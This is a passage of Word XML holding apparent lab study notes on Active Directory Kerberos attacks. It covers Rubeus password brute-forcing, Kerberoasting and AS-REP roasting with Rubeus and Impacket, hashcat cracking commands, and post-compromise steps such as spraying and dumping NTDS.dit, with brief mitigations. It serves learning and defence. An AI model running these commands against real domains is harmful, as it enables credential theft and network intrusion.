    <w:p w14:paraId="3C2EC945" w14:textId="6BA1C4B3" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. echo 10.10.138.156 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CONTROLLER.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt;&gt; C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38040595" w14:textId="17E42F1F" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F083B7" w14:textId="4E228514" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Rubeus.exe brute /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>password:Password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>1 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>noticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D58210A" w14:textId="58506E9A" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>may cause lockout depending on policies of domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AFF89E" w14:textId="1E3596FB" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00621033" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerbroasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> with Rubeus &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08EDDD93" w14:textId="55EDA1C8" w:rsidR="00621033" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>popular Kerberos attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186447A1" w14:textId="58A170E2" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allows user to request a service ticket for any service with a registered SPN and use ticket to crack the service password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44748370" w14:textId="2D4225EE" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>success of attack depends on password and if it is trackable as well as the privileges of the cracked service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5EDF5" w14:textId="349551A7" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Enumerating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberoastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A4CD5" w14:textId="51EA24F0" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E97D9A4" w14:textId="32485932" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92A1B1" w14:textId="365860A2" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="778004CF" w14:textId="2FAD5201" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>copy outputs into hash text file on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FC6D5" w14:textId="0ED10D4B" w:rsidR="00E34146" w:rsidRPr="0084205E" w:rsidRDefault="00E34146" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">crack with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04F79F3C" w14:textId="5F8CB964" w:rsidR="00D4661C" w:rsidRPr="0084205E" w:rsidRDefault="00D4661C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -m 13100 -a 0 hash.txt &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B12159" w14:textId="6B6FBD64" w:rsidR="00D4661C" w:rsidRPr="0084205E" w:rsidRDefault="00D4661C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38C19A4B" w14:textId="0364D0AB" w:rsidR="00D4661C" w:rsidRPr="0084205E" w:rsidRDefault="00D4661C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo python3 GetUserSPNs.py &lt;domain</w:t>
      </w:r>
      <w:r w:rsidR="00E206BD" w:rsidRPr="0084205E">
        <w:t>&gt;/&lt;account&gt;:&lt;password&gt; -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E206BD" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E206BD" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E206BD" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E206BD" w:rsidRPr="0084205E">
        <w:t>&gt; -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5EA31" w14:textId="561CFC18" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">will dump hashes for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerbroastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31001A82" w14:textId="7F3900D7" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -m 13100 -a 0 &lt;saved file&gt; &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E239CE" w14:textId="3E4021F6" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">What Can A Service Account </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D63A8F8" w14:textId="5EECFADF" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if account is a domain admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461162D" w14:textId="78FBB156" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">control </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> golden/silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF2C3F" w14:textId="3349CA90" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">dump </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30ECD433" w14:textId="145A734E" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If not domain admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D062D95" w14:textId="12C59D24" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>log into other systems and pivot/escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A1C16" w14:textId="7B23D61F" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use cracked password to spray against other service and domain admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA61D1" w14:textId="3797B02A" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514DFA92" w14:textId="62516105" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>strong service passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6703F812" w14:textId="4DE10507" w:rsidR="00E206BD" w:rsidRPr="0084205E" w:rsidRDefault="00E206BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>don’t make service accounts domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8ABC8D" w14:textId="34980BCE" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REP Roasting with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809BAF9" w14:textId="593FE551" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dumps krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D4C77" w14:textId="65D57F7C" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>do not have to be service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88A5E4" w14:textId="45878085" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>only requirement to be able to AS-REP roast a user is to have pre-authentication disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A3831" w14:textId="28017DF8" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if pre-authentication is disabled, a user can request any authentication data for any user and the KDC will return an encrypted TGT that can be cracked offline because KDC skips step of validating the user is real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A4CDD" w14:textId="0AA2728D" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dumping KRBASREP5 Hashes with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511405A" w14:textId="40F07C62" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>asreproast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64E084BB" w14:textId="689E2BD4" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>crack hashes with hash cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17044B6B" w14:textId="3C8CA7AC" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>insert 23$ after $krb5asrep$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0956B6" w14:textId="4BEE867F" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -m 18200 hash.txt &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA89C2" w14:textId="1DCC2C32" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REP Roasting Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC83CA0" w14:textId="7A693888" w:rsidR="008F46AE" w:rsidRPr="0084205E" w:rsidRDefault="008F46AE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
